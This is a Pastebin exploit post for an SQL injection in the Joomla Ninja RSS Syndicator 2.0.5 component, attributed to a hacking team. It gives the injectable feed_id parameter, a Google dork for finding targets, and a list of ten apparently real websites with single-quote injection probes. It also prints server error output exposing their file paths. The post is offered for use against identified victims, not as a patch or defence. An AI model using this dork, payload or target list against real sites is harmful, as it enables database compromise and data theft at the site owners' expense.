Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla Ninja RSS Syndicator Components 2.0.5 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/02/2019
- # Vendor Homepage : ninjaforge.com
- # Software Download Link : ninjaforge.com/extensions/download/ninja-rss-syndicator
- # Software Information Link : ninjaforge.com/extensions/ninja-rss-syndicator
- # Software Version : 2.0.5 for Joomla 2.5
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_ninjarsssyndicator''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- The ultimate Jooma RSS Feed Creator!
- Have complete control over your website's RSS feeds. Create feeds for sections or categories.
- Create any number of RSS feeds, select which sections and categories to include or exclude.
- Choose whether to render images or HTML in the feed.
- Output the whole the article in the feed, just the introduction or a certain number of words.
- The Ninja RSS Syndicator puts you in control of your feeds.
- ####################################################################
- # Impact :
- ***********
- Joomla Ninja RSS Syndicator 2.0.5 component for Joomla and other versions
- is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_ninjarsssyndicator&feed_id=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- ************************
- [+] chiesabergamo.it/it/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- [+] core.ieee-whispers.com/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- [+] pcinabol.hr/index.php?option=com_ninjarsssyndicator&feed_id=3%27
- [+] demujeres.com.ar/index/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- [+] enghelabe-eslami.com/index.php?option=com_ninjarsssyndicator&feed_id=5%27
- [+] streamproject.eu/index.php?option=com_ninjarsssyndicator&feed_id=2%27
- [+] douglasramiro.com.br/imacbrasil.com.br/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- [+] beeshrimp.at/index.php?option=com_ninjarsssyndicator&feed_id=3%27
- [+] csir.wielkanieszawka.alstal.eu/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- [+] sheridanfootball.com/joomla/index.php?option=com_ninjarsssyndicator&feed_id=1%27
- ####################################################################
- # SQL Database Error :
- *********************
- Strict Standards: Non-static method JLoader::import() should not be
- called statically in /web/htdocs/www.chiesabergamo.it
- /home/it/libraries/joomla/import.php on line 29
- Warning: fopen(D:\Hosting\4907873\html\joomla\components\com_ninjarsssyndicator
- \feed\feed1.xml) [function.fopen]: failed to open stream: Permission denied in
- D:\Hosting\4907873\html\joomla\components\com_ninjarsssyndicator
- \views\ninjarsssyndicator\tmpl\feedcreator.class.php on line 670
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment